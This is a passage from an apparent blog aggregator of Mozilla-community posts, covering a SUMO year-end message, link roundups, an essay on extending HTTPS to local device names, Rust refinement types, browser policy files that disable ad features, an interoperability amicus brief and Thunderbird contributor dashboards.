Thank you for an amazing year

None of this would have been possible without you, our incredible contributors, team members, and the wider Mozilla community. Your work, ideas, and feedback are what make SUMO a place where users can always find the help they need.

As we head into 2025, we are excited to keep building on this year’s progress. We will continue amplifying user voices, reducing complexity, improving accessibility, and exploring new ways to make support content even better.

Thank you for being part of this journey. Here is to another year of collaboration, growth, and making the internet better for everyone.

Let’s keep building a better web, one article at a time.

Don Martilinks for Christmas 2024

More stuff to read on the Internet.

Also, Quora Lies: WW2 Arial, Helvetica, Courier; also Times misinformation (More and more wrong answers out there, in easy to find places. Somehow, people will have to change content discovery habits to deal with scam culture and AI slop, but we don’t know how. IMHO the need for user research is greater than ever.)

[What say you, Spock?] My Proposed Terminology to Describe Bypassing Social Media Face ID Age Verification Systems (Interesting premise but are kids going to pick up hacking habits again? Kids back in the early days of the Internet had to hack because IT was rare, expensive, and flaky. But people who developed their Internet habits in the 2000s-2010s had it easy, because stuff was basically working but companies were still in create more value than you capture mode. I suppose kids today will have to learn to hack, not just beause of age verification stuff but because companies are in permanent hustle/growth hacking/value extraction mode, so the value available to the default user is less. Hack the consumer surplus?)

Step Right Up: The Chamber of Progress’s Ticketing Chamber of Horrors Fools Nobody (more news from the world of scam culture. Tech industry out of ideas? No problem, take low-reputation petty crimes like ticket scalping and scale them.)

Why Agentic AI Could Be Doomed To Fail, and 3 More AI Predictions for 2025 Accuracy of 75%-90% is state-of-the-art for AI….But if you have three steps of 75-90% accuracy, your ultimate accuracy is around 50%.

Linden Lab has spent $1.3B building Second Life and paid $1.1B to creators And since Linden Lab shares 90% of transactions with creators and only takes a 10% cut, the vast majority of the money generated through trade is paid to the creators themselves.

Classified fighter jet specs leaked on War Thunder – again (Do Wargaming.net players just take the games less seriously? This never seems to happen to the World of… games.)

The Ugly Truth About Spotify Is Finally Revealed Around this same time, I started hearing jazz piano playlists on Spotify that disturbed me. Every track sounded like it was played on the same instrument with the exact same touch and tone. Yet the names of the artists were all different….By total coincidence, Spotify’s profitability started to improve markedly around this time. and The Ghosts in the Machine, by Liz Pelly

Joey Hess: aiming at December The design goal of my 12 kilowatt system is to produce 1 kilowatt of power all day on a cloudy day in midwinter, which allows swapping between major loads (EV charger, hot water heater, etc) on a cloudy day and running everything on a sunny day. So the size of the battery bank doesn’t matter much. Batteries are getting cheaper fast too, but they are a wear item, so it’s better to oversize the solar system and minimize the battery….It costs more to mount solar panels now than the panels are worth.

Enrico Zini: New laptop setup (related: mine came up with fan and power light but no display, got helpful support)

Martin ThompsonExpanding what HTTPS means

So you have a device, maybe IoT, or just something that sits in a home somewhere. You want to be able to talk to it with HTTPS.

Recall Zooko’s “meaningful, unique, decentralized” naming trichotomy. HTTPS chooses to drop “decentralized”, relying on DNS as central control.

In effect, HTTPS follows a pretty narrow definition. To offer a server that works, you need to offer a TLS endpoint that has a certificate that meets a pretty extensive set of requirements. To get that certificate, you need a name that is uniquely yours, according to the DNS[1].

Unique names

It is entirely possible to assign unique names to devices. There’s an awful lot of IoT thingamabobs out there, but there are far more names we could ever use. Allocation can even be somewhat decentralized by having manufacturers manage the assignment[2].

The problem with unique names for IoT devices is that they are probably not going to be memorable (thanks Zooko). I don’t know about you, but printer.<somehash>.service-provider-cloud.example isn’t exactly convenient. Still, this is a system that is proven to work in real deployments.

It we want to make this approach work, maybe it just needs adapting. Following this approach, the problems we’d be seeking to solve are approximately:

  • How to make the names more manageable. For instance, how you manage to securely distribute search suffixes is a significant problem.

  • How to distribute certificates. ACME is an obvious choice, but what does the device talk to? Obviously, there is some need for something to connect to the big bad Internet, but how and how often?

  • Whether rules about certificates that apply to big bad Internet services fit in these contexts. Is it OK that you need to get fresh certificates every 45 days? How do Certificate Transparency requirements fit in this model? Does adding lots of devices to the system lead to scaling problems?

These problems all largely look like operational challenges. Any protocol engineering toward this end would be aimed at smoothing over the bumps. Many of the questions even seem to have fairly straightforward answers.

I don’t want to completely dismiss this approach as infeasible, but it seems clear that there are some pretty serious impediments. After all, nothing has really prevented someone from deploying systems this way. Many have tried. That few have succeeded[3] is perhaps evidence in support of it being too hard.

.onion names

Tor’s solution to this problem is making names self-authenticating. You take a public key (something for which no one else can produce a valid signature) and that becomes your identity. Your server name becomes a hash of that public key. Of course, “<somelongstring>.onion” as a name is definitely not user-friendly. You won’t want to be typing that name into an address bar[4].

That use of a name that is bound to a key recognizes that the identity of the service is bound to its name. In the world of DNS names, that binding is extrinsic and validated by a CA. In Tor, that binding is intrinsic: the name itself carries the binding.

Tor requires that endpoints follow different rules to the rest of the uniquely-named servers. Those rules include a particular protocol and deployment. Being, as they are, a bit onerous, only a few systems exist that are able to resolve “.onion” names. However, this approach does suggest that maybe there is an expansion to the definition of HTTPS that can be made to work.

.local with cryptographically bound names

The same concept as Tor could be taken to local names. Using “<somehash>.local” could be an option[5]. The idea being that the name is verified differently, but still unique.

A name that is cryptographically verified means that you could maybe drop some of the requirements you might otherwise apply to “normal” names.

The trick here is that you are asking clients to change a fair bit. Maybe less than Tor demands, but they still need to recognize the difference. Servers also need to understand that their name has changed.

The biggest problem with relying on unique names remains: these aren’t going to be easy to remember and type.

Nicknames

One approach for dealing with ugly names is to add nicknames. In a browser, you might have a bookmark labeled “printer”, which navigates to your printer at “<somehash>.local”. Or maybe you edit /etc/hosts to add a name alias.

Either way, usability depends on the creation of a mapping from the friendly name to the unfriendly one. From a security perspective, the mapping becomes a critical component.

The idea that you might receive this critical information from the network – for example, the DHCP Domain Search Option – is no good. We gave to assume that the network is hostile[6].

The real challenge here is that everyone will have their own nicknames, there can no canonical mapping. My printer and your printer are (probably) different devices, but we might want to use the same nickname.

TOFU and nicknames

Of course, in most of these cases, what you get from a system like this is effectively TOFU.

That is, you visit the server the first time and give it a friendly name. If that first visit was to the correct server, you can use the nickname securely thereafter. If not, and an attacker was present for your first visit, then you could be visiting them forever after.

This model works pretty well for SSH. It can also be hardened further if you care to do the extra work.

It’s a bit rough if the server key changes, which leads to some fair criticism. For use in the home, it might be good enough.

Non-unique names, unique identities

Recognizing that the practical effect of nicknames plus cryptographically-bound names, the logical next step is to just do away with the funny name entirely.

The reason we want the long and awkward label is twofold:

  • Firstly, we need to be able to find the thing and talk to it.

  • Then, we need to ensure that it has a unique identity, distinct from all other servers, so that it cannot be impersonated.

Those two things don’t need to be so tightly coupled.

Finding the thing works perfectly well without a ridiculous name. I would argue that mDNS works better for people if it uses names that make sense to them.

We could use the friendly name where it makes sense and an elaborate name – or identifier – everywhere that impersonation matters.

Managing impersonation risk

If there are potentially many printers that can use “printer.local”, how do we prevent each from impersonating any other? The basic answer is that each needs to be presented distinctly.

In the browser

On the web at least, this could be relatively simple. There are two concepts that are relevant to all interactions:

  • An origin. An origin is a tuple of values that are combined to form an unambiguous identifier. Origins are the basis for all web interactions. For ordinary HTTPS, this is a tuple that combines the scheme or protocol (“https”), the hostname (“www.example.com”), and the server port number (443).

  • A site. Certain features combine multiple origins for reasons that are convoluted and embarrassing. A site is defined as a test, rather than a tuple of values. Two origins can be same site or schemelessly same site.

Neither of these rely on having flat names for servers, which makes extending them a real possibility. For instance, “https://printer.local” might be recognized as non-unique and therefore be assigned a tuple that includes the server public key, thereby ensuring that it is distinct from all other “https://printer.local” instances.

From there, many of the reasons for impersonation can be managed. Passkeys, cookies, and any other state that a browser associates with a given “https://printer.local” are only presented to that instance, not any other. That’s a big chunk of the impersonation risk handled.

Passwords and phishing remain a challenge[7]. Outside of the use of password manager, it won’t be hard to convince people to enter a password into the wrong instance. That might be something that can be managed with UX changes, but that’s unlikely to be perfect.

Elsewhere

Outside of the browser, there are a lot of systems that do not update in quite the same fashion as browsers. Their definition of server identity is likely to be less precise than the origin/site model browsers use.

For these, it might be easier to formulate a name that includes a cryptographic binding to the public key. That name could be used in place of the short, friendly name. There are reserved names that can be used for this purpose.

Working out how to separate out places where names need to be unique and where they can be user-friendly isn’t that straightforward. A starting point might be to use an ugly name everywhere, with substitution of nicer names being done surgically.

One place that might need to be tweaked first is the protocol interactions. A printer might easily handle being known as “printer.local”, but it might be less able to handle being known as “<somehash>.whatever.example”. That would keep the changes for servers to a minimum.

Key rotation and other problems

One reasonable criticism of this approach is that no mechanisms exist to support servers changing their keys.

That’s mostly OK. Key rotation will mean a new identity, which resets existing state. Losing state is likely tolerable for cookies and passkeys. the phishing risk of having to enter a password to restore state, on the other hand, is pretty bad.

That’s a genuine problem that would need work. Of course, if the alternative is no HTTPS, it might be a good trade.

Servers in these environments probably shouldn’t be rotating keys anyway. Things like expiration of certificates largely only serve to ensure that servers are equipped to deal with change. A server at a non-unique name doesn’t have to deal with its name disappearing or having to renew it periodically. Those that want to deal with all of that can get a real name.

Of course, this highlights how this would require a distinct set of rules for non-unique names. Working out what this differences need to be is the hard part.

Conclusion

Extending the definition of HTTPS to include non-unique names is potentially a big step. However, it might mean that we can do away with the bizarre exceptions we have for unsecured HTTP in certain environments.

This post sketched out a model that requires very little of servers. Servers only need to present a certificate over TLS, with a unique key. It doesn’t care much what those certificates contain[8]. Changes are focused on clients and what they expect from devices.

Allowing a system that is obviously lesser to share the “HTTPS” scheme with the system we know (and love/hate/respect/loathe/dread) might seem dishonest or misleading. I maintain that – as long as the servers with real names are unaffected, as they would be – no harm comes from a more inclusive definition.

Expanding what it means to be an HTTPS server might help eliminate unsecured local services. After all, cleartext HTTP is not fit for deployment to the Internet.


  1. Or, maybe, a globally unique IP address. Really, you don’t want that though. ↩︎

  2. Let’s pretend that the manufacturer isn’t going to go out of business during the lifetime of the widget. OK, I can’t pretend: this is unrealistic. Even if they stay in business, there is no guarantee that they will maintain the necessary services. ↩︎

  3. With some notable exceptions. ↩︎

  4. And good luck noticing the phishing attack that replaces the name. It’s not that hard for an attacker to replace the name with one that matches a few characters at the start and end. How do you think Facebook got “facebookcorewwwi.onion”? ↩︎

  5. You might use xx--\<somehash>.local or some other reserved label to eliminate the risk, however remote, of collisions with existing names. ↩︎

  6. You hand your packets to the attacker to forward. ↩︎

  7. I should be recommending the use of passkeys here, pointing to Adam Langley’s nice book, but – to be perfectly frank – the user experience still sucks. Besides, denying that people use passwords is silly. ↩︎

  8. It might not be that simple. You probably want the server to include its name, if only to avoid unknown key share attacks. That might rule out the use of raw public keys. ↩︎

David TellerWhat would it take to add refinement types to Rust?

A few years ago, on a whim, I wrote YAIOUOM. YAOIOUM was a static analyzer for Rust that checked that the code was using units of measures correctly, e.g. a distance in meters is not a distance in centimeters, dividing meters by seconds gave you a value in m / s (aka m * s^-1).

YAIOUOM was an example of a refinement type system, i.e. a type system that does its work after another type system has already done its work. It was purely static, users could add new units in about one line of code, and it was actually surprisingly easy to write. It also couldn’t be written within the Rust type system, in part because I wanted legible error messages, and in part because Rust doesn’t offer a very good way to specify that (m / s) * s is actually the same type as m.

Sadly, it also worked only on a specific version of Rust Nightly, and the code broke down with every new version of Rust. It’s a shame, because I believe that there’s lots we could do with refinement types. Simple things such as units of measure, as above, but also, I suspect, we could achieve much better error messages for complex type-level programming, such as what Diesel is doing.

It got me to wonder how we could extend Rust in such a way that refinement types could be easily added to the language.

Don Martiturning off browser ad features from the command line

(Previously: Google Chrome ad features checklist, turn off advertising features in Firefox.)

The Mozilla Firefox and Google Chrome browsers both have built-in advertising features, which I generally turn off because putting advertising features, even privacy-enhancing ones, in browsers is a bad idea. But the problem with going in to the settings and changing things is not just that it takes time to find stuff, but that it only affects the one browser profile you’re in. So every time I add a user account or a new browser profile, I still need to go to Settings and change the defaults again.

Fortunately it’s possible to turn the ad stuff off once and have it stay off. Both browsers have enterprise management features.

With a few commands, you can be your own enterprise manager, put the right file in the right location, and not have to worry about it.

On Linux, the following content should go in /etc/firefox/policies/policies.json for Firefox:

{ "policies": { "Preferences": { "dom.private-attribution.submission.enabled": { "Status": "locked", "Type": "boolean", "Value": false }, "browser.urlbar.suggest.quicksuggest.sponsored": { "Status": "locked", "Type": "boolean", "Value": false } } } }

and the following content should go in /etc/opt/chrome/policies/managed/managed_policies.json for Chrome:

{ "BlockThirdPartyCookies": true, "PrivacySandboxAdMeasurementEnabled": false, "PrivacySandboxAdTopicsEnabled": false, "PrivacySandboxPromptEnabled": false, "PrivacySandboxSiteEnabledAdsEnabled": false }

The full list of available settings is at Chromium - Policy List. Some of these can be handy additions to the managed_policies.json file especially if you use multiple profiles. For example, I also add "DefaultBrowserSettingEnabled": false so that Google Chrome does not ask to be default browser.

Both files should be owned by the owner of the containing directory (root:root on my system) and mode 755.

That’s it.

There are ways to set this stuff up on Mac OS, too. I think it’s supposed to be /Applications/Firefox.app/Contents/Resources/distribution/policies.json for Firefox, but the /etc/ location might also work. For Google Chrome, there are Set up Chrome browser on Mac instructions.

There are also mentions of how to manage these two browsers on Microsoft Windows. If someone who blogs about those two OSs has instructions on how to set this up on other OS, please let me know and I’ll link to your blog post.

  • For Mac OS: YOUR_BLOG_LINK_HERE

  • For Microsoft Windows: YOUR_BLOG_LINK_HERE

Appeasement fails, and one more tip

For about the past five years, a lot of proponents of in-browser ad features have been going on about how we really need to let the advertisers have their privacy-preserving advertising systems in the browser, because otherwise the surveillance business is going to do something worse. But, as we can see from recent news, that’s not how boundary testing works. They put the ad features in the browser, and then went ahead and increased fingerprinting anyway.

Browser developer: can we make the browser a little creepy so we don’t have to do worse stuff like fingerprinting?

User: ok, fine (clicks Got it)

Browser developer: well if you didn’t mind that, you won’t mind this…fingerprinting…either, right?

User: (facepalm)

Not a surprise for readers of relationship blogs, which tend to be more realistic about how to handle boundary testing than web development blogs. For example, Terri Cole writes about a constructive way to respond to boundary testing, in Navigating Boundaries: Strategies for Addressing Repeat Violations with Effective Consequences.

You’ve 1) set a boundary, 2) communicated it to them, and, after the boundary was crossed, 3) named a consequence to let them know, if this happens again, this is what I am doing.

Accepting any in-browser ad feature just encourages them to test boundaries again and make the browser incrementally creepier and more intrusive. Consequences need to happen early and predictably, or the person testing your boundaries learns that they can test further. Letting creepy behavior slide is a way to get more of it later.

How can users realistically communicate with big companies that only pay attention to lawsuits, news stories, and metrics measured in millions? You can’t really turn off browser fingerprinting—that’s the point, it’s based on hardware or software features that are hard for the user to change—but you can send a signal (and as a useful side effect protect yourself from nasty stuff like malvertising targeted based on your employer.) One of the best underrated privacy tips is just to visit https://myadcenter.google.com/home and set Personalized Ads to Off. This doesn’t just help protect yourself, it also (1) moves a metric that they track, so sends a message that they will get, and (2) it does reduce surveillance advertising revenue, so you help limit the flow of money to the other side. Turning this stuff off is not mainly about protecting yourself, it’s about helping at-risk people hide in the crowd and about reducing the incentives to invest in surveillance.

No privacy setting or tool is a total fix by itself, but turning off in-browser ad features and turning off personalization are both pretty effective for the time invested. More tips: effective privacy tips

Related

Google Chrome ad features checklist

turn off advertising measurement in Apple Safari

turn off advertising features in Firefox

dmarti/browser-adfraud-protection: RPM package to install a policies file

Bonus links

Companies issuing RTO mandates “lose their best talent”: Study (but it’s not about talent. When the company is increasing profits by more deception, surveillance, and value extraction from existing customers, then employees who can signal loyalty are more valuable than employees who might invent something new and legit, which is going to turn out to not get made because it doesn’t look as revenue-positive as the crime options anyway)

Surprise! California’s 40 Qs of Rising Minimum Wage & Fast Food Industry Growth (Beating USA) (There are a lot of possible reasons why the Econ 101 answer turns out not to be right in the real world. An hour of labor that the employer pays $20 for might be worth more than an hour done by the same person for $10.)

Ghost artists on Spotify (Sounds like AI slop blogs on ad networks to me)

Why Does U.S. Technology Rule? What I’m suggesting is that America’s tech advantage may bear considerable resemblance to Britain’s banking advantage. That is, it may have less to do with institutions, culture and policy than the fact that for historical reasons the world’s major technology hubs happen to be in the United States…

Feed readers which don’t take “no” for an answer (More results from a really useful tool. If, like me, your way to avoid The Algorithm is to make your own feed reader, go sign up to see if you have all the If-Modified-Since and related features working correctly.)

The rise of informal news networks, We’ll stop looking down on content creators, Media owners will protect the powerful, Content creators find a place in newsrooms Declaring platform independence (My favorites from the Nieman Lab end of year series. Related: Does YouTube have a future if its creators have to make money elsewhere? IMHO this helps make a case for the strength of the YouTube scene—if YouTubers can keep doing their thing even when the algorithm stifles and demonetizes them, they’re doing something right.)

Watchdog to issue new guidance after report finds air fryers may be listening (More reasons why I still aspire to be the guy who cooks with just a vintage cast-iron skillet and a razor-sharp chef’s knife)

The Rush for AI-Enabled Drones on Ukrainian Battlefields (related: For first time, Ukraine attacks Russian positions using solely ground, FPV drones)

Nodriver: A Game-Changer in Web Automation Designed to bypass even the most sophisticated anti-bot measures, Nodriver is a high-performance, asynchronous web automation framework tailored for developers who require a robust and reliable tool for scraping, testing, and automating web interactions. (previously, previously)

C.A. Goldberg, PLLC Turned Ten and We Are Looking Back at the Firm’s Most Memorable Moments Over the Past Decade!!! (Why Omegle is no longer a thing, and a substantial part of the reason that Section 230 is no longer a guaranteed everything is allowed if you can blame a user for uploading it rule.)

Trump2 Will Shake Up the “Competition Safe Spaces” What we know is that there is complete paralysis in Brussels as we start to take a measure of what may be coming our way – with decisions (DMA non compliance, Google ad-tech) and policy initiatives all stalled in the wings, all in suspended animation until the new Administration shows its true colours and we figure out what threats and retribution might be coming our way.

Australia fires publisher damages claim at Google, Australia approves law banning social media for under 16s (are they trying to grow a generation of teen Wikipedia editors and Fediverse influencers? might work)

Mozilla Privacy BlogMozilla Joins Amicus Brief Supporting Software Interoperability

UPDATE – December 20, 2024

We won!

Earlier this week the Ninth Circuit issued an opinion that thoroughly rejects the district court’s dangerous interpretation of copyright law. Recall that, under the district court’s ruling, interoperability alone could be enough for new software to be an infringing derivative work of some prior software. If upheld, this would have threatened a wide range of open source development and other software.

The Ninth Circuit corrected this mistake. It wrote that “neither the text of the Copyright Act nor our precedent supports” the district court’s “interoperability test for derivative works.” It concluded that “mere interoperability isn’t enough to make a work derivative.” Adding that “the text of the Copyright Act and our case law teach that derivative status does not turn on interoperability, even exclusive interoperability, if the work doesn’t substantially incorporate the preexisting work’s copyrighted material.”

Original post, March 11, 2024

In modern technology, interoperability between programs is crucial to the usability of applications, user choice, and healthy competition. Today Mozilla has joined an amicus brief at the Ninth Circuit, to ensure that copyright law does not undermine the ability of developers to build interoperable software.

This amicus brief comes in the latest appeal in a multi-year courtroom saga between Oracle and Rimini Street. The sprawling litigation has lasted more than a decade and has already been up to the Supreme Court on a procedural question about court costs. Our amicus brief addresses a single issue: should the fact that a software program is built to be interoperable with another program be treated, on its own, as establishing copyright infringement?

We believe that most software developers would answer this question with: “Of course not!” But the district court found otherwise. The lower court concluded that even if Rimini’s software does not include any Oracle code, Rimini’s programs could be infringing derivative works simply “because they do not work with any other programs.” This is a mistake.

The classic example of a derivative work is something like a sequel to a book or movie. For example, The Empire Strikes Back is a derivative work of the original Star Wars movie. Our amicus brief explains that it makes no sense to apply this concept to software that is built to interoperate with another program. Not only that, interoperability of software promotes competition and user choice. It should be celebrated, not punished.

This case raises similar themes to another high profile software copyright case, Google v. Oracle, which considered whether it was copyright infringement to re-implement an API. Mozilla submitted an amicus brief there also, where we argued that copyright law should support interoperability. Fortunately, the Supreme Court reached the right conclusion and ruled that re-implementing an API was fair use. That ruling and other important fair use decisions would be undermined if a copyright plaintiff could use interoperability as evidence that software is an infringing derivative work.

In today’s brief Mozilla joins a broad coalition of advocates for openness and competition, including the Electronic Frontier Foundation, Creative Commons, Public Knowledge, iFixit, and the Digital Right to Repair Coalition. We hope the Ninth Circuit will fix the lower court’s mistake and hold that interoperability is not evidence of infringement.

The post Mozilla Joins Amicus Brief Supporting Software Interoperability appeared first on Open Policy & Advocacy.

Mozilla ThunderbirdOpen Source, Open Data: Visualizing Our Community with Bitergia

Thunderbird’s rich history comes with a complex community of contributors. We care deeply about them and want to support them in the best way possible. But how does a project effectively do just that? This article will cover a project and partnership we’ve had for most of a year with a company called Bitergia. It helps inform the Thunderbird team on the health of our community by gathering and organizing publicly available contribution data.


In order to better understand what our contributors need to be supported and successful, we sought the ability to gather and analyze data that would help us characterize the contributions across several aspects of Thunderbird. And we needed some data experts that understood open source communities to help us achieve this endeavor. From our relationship with Mozilla projects, we recalled a past partnership between Mozilla and Bitergia, who helped it achieve a similar goal. Given Bitergia’s fantastic previous work, we explored how Thunderbird could leverage their expertise to answer questions about our community. Likewise, you can read Bitergia’s complimentary blog post on our partnership as well.

Thunderbird and Bitergia Join Forces

Thunderbird and Bitergia started comparing our data sources with their capabilities. We found a promising path forward on gathering data and presenting it in a consumable manner. The Bitergia platform could already gather information from some data sources that we needed, and we identified functionality that had to be added for some other sources. 

We now have contribution data sets gathered and organized to represent these key areas where the community is active:

  • Thunderbird Codebase Contributions – Most code changes take place in the Mercurial codebase with Phabricator as the code reviewing tool.  This Mercurial codebase is mirrored in GitHub which is more friendly and accessible to contributors. There are other important Thunderbird repositories in GitHub such as Thunderbird for Android, the developer documentation, the Thunderbird website, etc.
  • Bug ActivityBugzilla is our issue tracker and an important piece of the contribution story.
  • TranslationsMozilla Pontoon is where users can submit translations for various languages.
  • User Support ForumsThunderbird’s page on support.mozilla.org is where users can request support and provide answers to help other users.
  • Email List DiscussionsTopicbox is where mailing lists exist for various areas of Thunderbird. Users and developers alike can watch for upcoming changes and participate in ongoing conversations.

Diving into the Dashboards

Once we identified the various data sets that made sense to visualize, Bitergia put together some dashboards for us. One of the key features that we liked about Bitergia’s solution is the interactive dashboard. Anyone can see the public dashboards, without even needing an account!

All of our dashboards can be found here: https://thunderbird.biterg.io/

All of the data gathered for our dashboards was already publicly available. Now it’s well organized for understanding too! Let’s take a deeper look at what this data represents and see what insights it gives us on our community’s health.

Thunderbird Codebase Contributions

As stated earlier, the code contributions happen on our Mercurial repository, via the Phabricator reviewing tool. However, the Bitergia dashboard gathers all its data from GitHub, the Mercurial mirror pluss our other GitHub repositories. You can see a complete list of GitHub repositories that are considered at the bottom of the Git tab.

One of the most interesting things about the codebase contributions, across all of our GitHub repositories, is the breakdown of which organizations contribute. Naturally, most of the commits will come from people who are associated with Thunderbird or Mozilla. There are also many contributors who are not associated with any particular organization (the Unknown category).

One thing we hope to see, and will be watching for, is for the number of contributors outside of the Thunderbird and Mozilla organizations to increase over time. Once the Firefox and Thunderbird codebases migrate from Mercurial to git, this will likely attract new contributors and it will be interesting to see how those new contributions are spread across various organizations.

Another insightful dashboard is the graph that displays our incoming newcomers (seen from the Attracted Committers subtab). We can see that over the last year we’ve seen a steady increase in the number of people that have committed to our GitHub repositories for the first time. This is great news and a trend we hope to continue to observe!

Bug Activity

All codebases have bugs. Monitoring discovered and reported issues can help us determine not only the stability of the project itself, but also uncover who is contributing  their time to report the issues they’ve seen. Perhaps we can even run some developer-requested test cases that help us further solve the user’s issue. Bug reporting is incredibly important and valuable, so it is obviously an area we were interested in. You can view these relevant dashboards on the Bugzilla tab.

Translations

Many newcomers’ first contribution to an open source project is through translations.. For the Firefox and Thunderbird projects, Pontoon is the translation management system, and you can find the Translation contribution information on the Pontoon tab.

Naturally, any area of the project will see some oscillating contribution pattern for several reasons and translations are no different. If we look at the last 5 years of translation contribution data, there are several insights we can take away. It appears that the number of contributors drop off after an ESR release, and increase in a few chunks in the months prior to the release of the next ESR. In other words, we know that historically translations tend to happen toward the end of the ESR development cycle. Given this trend, If we compare the 115 ESR cycle (that started in earnest around January 2023) to the recent 128 ESR cycle (that started around December 2023), then we see far more new contributors, indicating a healthier contributor community in 128 than 115.

User Support Forums

Thus far we have talked about various code contributions that usually come from developers, but users supporting users is also incredibly important. We aim to foster a community that happily helps one another when they can, so let’s take a look at what the activity on our user support forums looks like in the Support Forums tab.

For more context, the data range for these screenshots of the user support forum dashboards has been set to the last 2 years instead of just the last year.

The good news is that we are getting faster at providing the first response to new questions. The first response is often the most important because it helps set the tone of the conversation.

The bad news is that we are getting slower at actually solving the new questions, i.e. marking the question as “Solved”. In the below graph, we see that over the last two years, our average time to mark an issue as “Solved” is affecting a smaller percentage of our total number of questions.

The general take away is that we need help in answering user support questions. If you are a knowledgeable Thunderbird user, please consider helping out your fellow users when you can.

Email List Discussions

Many open source projects use public mailing lists that anyone can participate in, and Thunderbird is no different. We use Topicbox as our mailing list platform to manage several topic-specific lists. The Thunderbird Topicbox is where you can find information on planned changes to the UI and codebase, beta testing, announcements and more. To view the Topicbox contributor data dashboard, head over to the Topicbox tab.

With our dashboards, we can see the experience level of discussion participants. As you might expect, there are more seasoned participants in conversations. Thankfully, less experienced people feel comfortable enough to chime in as well. We want to foster these newer contributors to keep providing their valuable input in these discussions!

Takeaways

Having collated public contributor data has helped Thunderbird identify areas where we’re succeeding. It’s also indicated areas that need improvement to best support our contributor community. Through this educational partnership with Bitergia, we will be seeking to lower the barriers of contribution and enhance the overall contribution experience.

If you are an active or potential contributor and have thoughts on specific ways we can best support you, please let us know in the comments. We value your input!

If you are a leader in an open source project and wish to gather similar data on your community, please contact Bitergia for an excellent partnership experience. Tell them that Thunderbird sent you!

The post Open Source, Open Data: Visualizing Our Community with Bitergia appeared first on The Thunderbird Blog.